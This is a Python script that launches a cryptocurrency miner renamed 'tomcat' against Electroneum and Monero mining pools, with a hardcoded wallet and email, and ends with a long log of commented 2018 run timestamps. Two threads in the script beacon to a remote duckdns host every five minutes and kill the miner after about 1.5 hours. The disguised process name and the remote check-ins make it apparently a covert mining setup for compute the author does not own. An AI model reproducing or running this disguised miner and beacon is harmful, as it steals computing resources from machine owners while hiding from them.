import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:01.599292
#2018-02-17 16:35:06.136691
#2018-02-17 18:22:04.549103
#2018-02-17 20:10:08.105031
#2018-02-17 21:57:05.093248
#2018-02-17 23:42:03.736428
#2018-02-18 01:32:03.632532
#2018-02-18 03:18:01.732759
#2018-02-18 05:07:03.820740
#2018-02-18 06:58:06.946169
#2018-02-18 08:47:07.099520
#2018-02-18 10:34:01.400411
#2018-02-18 12:19:04.226422
#2018-02-18 14:06:06.865450
#2018-02-18 15:55:08.283005
#2018-02-18 17:46:06.631197
#2018-02-18 19:34:05.288019
#2018-02-18 21:19:04.919887
#2018-02-18 23:07:06.203479
#2018-02-19 00:54:05.843196
#2018-02-19 02:41:06.158628
#2018-02-19 04:28:01.887015
#2018-02-19 06:13:03.883611
#2018-02-19 08:01:04.573274
#2018-02-19 09:51:05.533584
#2018-02-19 11:39:07.400146
#2018-02-19 13:26:08.220970
#2018-02-19 15:14:06.354483
#2018-02-19 17:03:07.418044
#2018-02-19 18:49:04.058928
#2018-02-19 20:35:08.212117
#2018-02-19 22:21:07.131741
#2018-02-20 00:08:03.987332
#2018-02-20 01:55:04.686633
#2018-02-20 03:44:01.400255
#2018-02-20 05:29:06.481890
#2018-02-20 07:13:04.918301
#2018-02-20 08:59:01.795597
#2018-02-20 10:43:02.118238
#2018-02-20 12:29:01.864004
#2018-02-20 14:15:10.607602
#2018-02-20 15:58:07.283770
#2018-02-20 17:44:12.185079
#2018-02-20 19:34:08.478441
#2018-02-20 21:20:07.012579
#2018-02-20 23:05:09.394384
#2018-02-21 00:48:02.014633
#2018-02-21 02:33:01.531958
#2018-02-21 04:21:07.429737
#2018-02-21 06:09:06.214240
#2018-02-21 07:55:06.500608
#2018-02-21 09:41:05.493288
#2018-02-21 11:32:06.583936
#2018-02-21 13:22:01.366702
#2018-02-21 15:06:12.234774
#2018-02-21 16:55:11.203212
#2018-02-21 18:45:05.895314
#2018-02-21 20:31:04.160416
#2018-02-21 22:17:02.155530
#2018-02-22 00:06:07.537733
#2018-02-22 01:53:03.332300
#2018-02-22 03:40:01.528350
#2018-02-22 05:26:06.000162
#2018-02-22 07:11:03.762201
#2018-02-22 08:57:04.689262
#2018-02-22 10:44:06.933114
#2018-02-22 12:32:01.651367
#2018-02-22 14:17:05.658102
#2018-02-22 16:04:01.273053
#2018-02-22 17:49:01.874058
#2018-02-22 19:35:06.084137
#2018-02-22 21:27:07.883129
#2018-02-22 23:13:02.185494
#2018-02-23 00:59:05.826902
#2018-02-23 02:46:04.469251
#2018-02-23 04:34:05.322813
#2018-02-23 06:20:05.920726
#2018-02-23 08:07:03.736403
#2018-02-23 10:24:01.671845
#2018-02-23 12:17:07.137370
#2018-02-23 14:04:08.441440
#2018-02-23 15:54:06.979909
#2018-02-23 17:39:06.985829
#2018-02-23 19:27:07.057564
#2018-02-23 21:11:06.349757
#2018-02-23 22:57:07.956872
#2018-02-24 00:44:06.306215
#2018-02-24 02:37:06.725678
#2018-02-24 04:31:07.595647
#2018-02-24 06:16:01.807727
#2018-02-24 08:04:05.900927
#2018-02-24 09:48:06.659810
#2018-02-24 11:43:04.019856
#2018-02-24 13:35:01.775764
#2018-02-24 15:22:01.438771
#2018-02-24 17:11:04.587764
#2018-02-24 19:03:01.294690
#2018-02-24 20:51:05.231574
#2018-02-24 23:10:02.452925
#2018-02-25 02:25:03.736258
#2018-02-25 06:07:06.405040
#2018-02-25 11:38:07.827743